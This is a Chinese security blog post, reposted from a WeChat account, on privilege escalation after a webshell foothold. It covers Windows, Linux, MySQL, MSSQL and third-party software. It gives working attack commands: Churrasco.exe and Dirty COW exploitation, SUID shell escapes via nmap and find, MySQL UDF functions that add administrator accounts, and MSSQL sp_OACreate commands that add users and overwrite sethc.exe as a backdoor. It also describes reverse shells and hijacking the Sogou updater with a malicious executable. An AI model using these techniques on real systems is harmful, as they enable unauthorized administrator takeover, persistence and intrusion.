渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

admin 2022年3月7日01:37:57评论220 views字数 8706阅读29分1秒阅读模式


【Hacking黑白红】,一线渗透攻防实战交流平台

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

回复“电子书”获取web渗透、CTF电子书:

回复“视频教程”获取渗透测试视频教程;  

回复“内网书籍”获取内网学习资料;        

回复“CTF工具”获取渗透、CTF全套工具;

回复“内网渗透;”获取内网渗透资料        





提权Webshell:尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取shell。
反弹shell:利用kali虚拟机msfVENOM编写反弹shell脚本
被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用
开启监听:msfconsole模块监听响应的反弹shell脚本(当靶机点击脚本的时候),进入meterpreter模块,可以getsystem权限,获取信息等等,还可以开启远程服务功能(lcx,scocks5)

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)
Windows系统漏洞提权思路---windows(可执行文件:一种是.com;另一种.exe)
系统溢出漏洞操作说明
1、明确漏洞编号及版本
2、明确漏洞利用平台及版本
3、确保cmd执行权限正常运行
4、确保服务器相关防护软件情况

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)


查看系统补丁,提权前期准备【前提已获取webshell】
  • 方法一:输入shell进入到该主机的shell下,然后:systeminfo 查看系统详细信息
  • 方法二:进入到 meterpreter 下,执行 run post/windows/gather/enum_patches 可以直接查看补丁情况
  • 方法三:post/multi/recon/local_exploit_suggester 模块,用于快速识别系统中可能被利用的漏洞
  • 方法四:WMIC命令也可以查看补丁数量
  • wmic qfe get Caption,Description,HotFixID,InstalledOn
  • 也可以直接找是否存在某个cve-2018-8120对应的KB4131188补丁
  • wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4131188"
  • 方法五:Windows Exploit Suggester
    该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其只需要目标系统的信息。
    通过msf生成反弹exe进行反弹操作,获取meterpreter通道
    监听获取成功后,进行exp的筛选
    探测可提取的模块use post/multi/recon/local_exploit_suggester

    windows系统漏洞示例
    根据systeminfo查看补丁信息,发现未打上相应的补丁kb952004、KB956572,于是利用上传巴西烤肉(Churrasco.exe)exp提权,Churrasco.exe是Windows2003系统下的一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。
    由于低权限用户无法执行太多操作,可以利用反弹上传Churrasco.exe,后续可以利用它来做提权。

    渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

    添加用户以及加入管理员组,方便我们提高操作权限。
  • 渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

    输入net user指令查看是否添加成功,最后提权成功。


  • 渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

linux系统提权思路
linux基础信息收集
uname -a 显示全部系统信息
cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版
cat /etc/passwd 所有人都可看
ps aux | grep root
(1)#内核漏洞提权
方法:
通过信息收集方式得知linux内核版本
使用searchspolit搜索相应版本漏洞
例:searchsploit linux 4.0.0
searchsploit Ubuntu 16.04
searchsploit Ubuntu 16 kernel 3.10
找到对应的.c源文件,将其发送到靶机/或是靶机下载 scp, wget http://127.0.0.1/xx.c

编译,gcc xxx.c -o exp
(2)#SUID提权
概念
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。
特点
SUID 权限仅对二进制程序有效
执行者对于该程序需要有可执行权限(x权限)
SUID 权限仅仅在程序执行过程中有效
执行该程序时,执行者将具有该程序拥有者的权限
首先在本地查找符合条件的文件,有以下三个命令
列出来的所有文件都是以root用户权限来执行的,接下来找到可以提权的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
常用的可用于suid提权的文件
Nmap、Vim、find、Bash、More、Less、cp
(3)#nmap提权
较旧版本的Nmap(2.02至5.21)带有交互模式,从而允许用户执行shell命令。因此可以使用交互式控制台来运行具有相同权限的shell。
方法一:
启动交互模式,使用nmap --interactive
!sh #执行之后将提供一个提权后的shell。
方法二:
Metasploit模块,也可以通过SUID Nmap二进制文件进行提权。
exploit/unix/local/setuid_nmap
(4)#find提权
实用程序find用来在系统中查找文件。同时,它也有执行命令的能力。因此,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。
(5)#sudo提权
sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。
sudo 表示 “superuser do”。它允许已验证的用户以其他用户的身份来运行命令。其他用户可以是普通用户或者超级用户。然而,大部分时候我们用它来以提升的权限来运行命令。

linux内核提权示例
1.使用nc或lcx反弹到攻击者的电脑
2.使用 uname –a 查看Linux 版本内核等系统信息
3.在exploit库中寻找相应系统版本和内核的漏洞利用模块。(www.exploit-db.com)
4.上传exp到目标服务器中,chmod 777赋予exp权限,需要进行编译的先进行编译。
5.提权后便可以添加ssh用户 (useradd -o -u 0 -g 0 username)
通过webshell上传ft.pl,为了等下的反弹shell

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

系统信息收集Uname -a显示的版本内核为(2.6.24>2.6.22),可能存在脏牛漏洞

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

ft.pl文件反弹shell

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

Kali开启监听

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

编译dirty.c文件,生成一个可执行的EXP,运行./dirty su123(密码)
生成账号firefart,密码su123

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)


新生成的管理员用户firefart把原来的root用户替换掉了(root--->firefart)

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)


可以通过ssh连接

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

数据库提权思路
数据库获取网站数据库的账号和密码
--通过读取一些数据库配置文件
数据库配置文件:命令规则(data、sql、inc、config、conn、database等)
--通过mysql数据库的user表
数据库安装文件:安装目录下data/mysql/user.myd
frm:描述表结构文件,字段长度
myi:索引信息
myd:数据库信息文件,存储数据信息

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

(1)mysql数据库——udf提权
udf文件:udf(user-defined-function)是mysql得一个拓展接口,也称为用户自定义函数,用户通过自定义函数来实现在mysql中无法方便实现得功能
udf文件后缀名: .dll(windows)linux后缀名:.so
提权原理
已知root账号和密码,利用root权限,创建带有调用cmd函数的“udf.dll”。当我们把udf.dll导出指定文件夹引入mysql时候,其中的调用函数拿出来当作mysql函数来使用
注意事项
mysql版本小于5.1版本,udf.dll文件在windows2003下放在:c:windowssystem32。在windows2000放在:c:winntsystem32
mysql版本大于5.1版本,udf.dll文件必须放置在mysql安装目录下的libplugin。但是大于5.1版本的时候没有plugin这个文件夹,需要自己创建。
利用udf文件加载函数执行命令
create function cmdshell returns string soname 'udf.dll'; //returns string soname ‘导出的DLL路径’;
select cmdshell('net user ndsec ndsecpw /add');
select cmdshell('net localgroup administrators ndsec /add');
drop function cmdshell;
(2)#数据库提权——mof提权
mof文件:mof文件是mysql数据库的扩展文件
存放路径(C:/windows/system32/wbem/mof/nullevt.mof)
其作用是每隔5秒就会去监控进程创建和死亡。
提权条件
1、windows2003及以下
2、mysql启动身份具有权限去读写C:/windows/system32/wbem/mof/目录
3、secure-file-priv=不为null
提权原理
mof文件每5秒就会执行,而且是系统权限,我们可以通过load_file将文件写入/wbme/mof,然后系统每5秒就会执行一次我们上传的mof
mof当中是一段vbs脚本,通过通过控制vbs脚本让系统执行命令,进行提权。
(3)#数据库提权——反弹端口提权
提权条件
1、获取数据库的账号和密码,同时能够执行查询命令。
2、secure_file_priv=,可导出udf.dll到系统目录或者mysql数据库安装目录下的lib下plugin
3、授权mysql数据库远程用户的登录
(4)#数据库提权——启动项提权 (这种方法不推荐)
提权原理
使用mysql写文件,写一段vbs代码到开启自启动中。服务器重启的时候达到创建用户并提取。可以使用DDOS迫使服务器重启
提权条件
secure_file_priv不为null
已知账号和密码
(5)linux系统-udf提权
上传脚本进行监听
靶机连接数据库
查看版本
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('chmod u+s /usr/bin/find');
find / -exec "/bin/sh" ;
mssql数据库SA权限
执行命令存储过程:xp_cmshell、sp_OACreate
注册表存储过程:xp_regwrite
存储过程
其实质就是一个“集合”。它就是存储在sqlserver中预先定义好的“sql语句集合。”使用T-SQL语言编写好的各种小脚本共同组合成的集合体,我们就称为“存储过程”
利用xp_cmdshell提权
(1)xp_cmdshell解释
Xp_cmdshell是sqlserver中的组件,可以以操作系统命令解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。可以用来执行系统命令
(2)xp_cmdshell开启
默认在sql server2000中是开启的,在sqlserver2005之后的版本默认禁止。如果我们有sa权限,可以用命令开启
exec sp_configure ‘show advanced options’ , 1;reconfigure;
exec sp_configure ‘xp_cmdshell’, 1;reconfigure;
xp_cmdshell 关闭
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;
(3)当xp_cmdshell删除或出错的情况下,使用sp_OACreate组件
开启组件SP_OACreate
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',1;reconfigure;
关闭组件SP_OACreate
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;
利用SP_OACreate添加用户提权
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user quan 123456 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators quan /add'
利用SP_OACreate的其他操作
sp_OACreate替换粘贴键
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
execsp_oamethod@o,'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
execsp_oamethod@o,'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32dllcachesethc.exe';
(4)使用注册表存储过程:xp_regwrite
udf提权示例
  • (1)mysql版本小于5.1版本,udf.dll文件在windows2003下放在:c:windowssystem32。在windows2000放在:c:winntsystem32
  • (2)mysql版本大于5.1版本,udf.dll文件必须放置在mysql安装目录下的libplugin。但是大于5.1版本的时候没有plugin这个文件夹,需要自己创建。
  • (3)利用udf文件加载函数执行命令
    ```shell
    create function cmdshell returns string soname 'udf.dll'; //returns string soname ‘导出的DLL路径’;
    select cmdshell('net user ndsec ndsecpw /add');
    select cmdshell('net localgroup administrators ndsec /add');
    drop function cmdshell;
```
用蚁剑连接一句话木马,执行蚁剑的数据库功能模块(可以执行SQL语句),查看版本(5.5.53>5.1),udf.dll文件必须放置在mysql安装目录下的libplugin。但是大于5.1版本的时候没有plugin这个文件夹,需要自己创建。

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

在c:/phpStudy/MySQL/lib/目录下创建一个文件夹plugin,然后上传我们的udf.dll文件

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

把udf.dll导出指定文件夹引入mysql,调用cmd函数的”udf.dll”

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

查看当前用户,当前并无ndsec用户

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

调用cmd创建用户,用户名为ndsec,密码为ndsecpw
net user ndsec ndsecpw /add

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

添加用户ndsec进系统用户组
net user localgroup administrators ndsec /add

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

删除cmd函数

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

查看当前系统用户,发现添加用户成功,提权成功

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

第三方软件提权思路
第三方软件指的是该非线性编辑系统生产商以外的软件公司提供的软件,功能十分强大,有些甚至是从工作站转移过来的,可以这么说,非线性编辑系统之所以能做到效果变幻莫测,匪夷所思,吸引众人的视线,完全取决于第三方软件。第三方软件提权,就是利用第三方软件存在的漏洞来进行获取一个权限的操作。

Sogou输入法提权示例
由于搜狗输入法默认设置是自动更新(很少有人去更改这个设置),更新程序没有对exe做任何校验直接在输入法升级时调用运行,导致可以执行恶意代码。
在获取webshell的前提下,在D盘下找到了搜狗的路径

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

编辑一个PinyinUp的bat文件,通过转义软件编译成PinyinUp.exe,里面存放着恶意代码

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

上传我们的PinyinUp.exe文件,把之前搜狗路径下的PinyinUp文件改个名字

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

当用户更新词库的时候就会调用我们的PinyinUp.exe程序,然后生成用户密码

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

添加成功

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

作者:J01n,文章来源于先知社区


更多学习渗透学习资料欢迎加入知识星球:Hacking藏经阁

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)


推荐阅读:



渗透实战系列


【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)

▶【渗透实战系列】|39-BC渗透的常见切入点(总结)

【渗透实战系列】|38-对某色情直播渗透

【渗透实战系列】|37-6年级小学生把学校的网站给搞了!

【渗透实战系列】|36-一次bc推广渗透实战

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

【渗透实战系列】|31-记一次对学校的渗透测试

【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)

【渗透实战系列】|29-实战|对某勒索APP的Getshell

【渗透实战系列】|28-我是如何拿下BC站的服务器

【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)

【渗透实战系列】|26一记某cms审计过程(步骤详细)

【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

【渗透实战系列】|23-某菠菜网站渗透实战

【渗透实战系列】|22-渗透系列之打击彩票站

【渗透实战系列】|21一次理财杀猪盘渗透测试案例

【渗透实战系列】|20-渗透直播网站

【渗透实战系列】|19-杀猪盘渗透测试

【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

长按-识别-关注

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

Hacking黑白红

一个专注信息安全技术的学习平台

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

点分享

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

点收藏

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

点点赞

渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

点在看


原文始发于微信公众号(Hacking黑白红):渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月7日01:37:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试中的提权思路(Linux、windows、数据库、第三方软件提权)http://cn-sec.com/archives/818793.html

发表评论

匿名网友 填写信息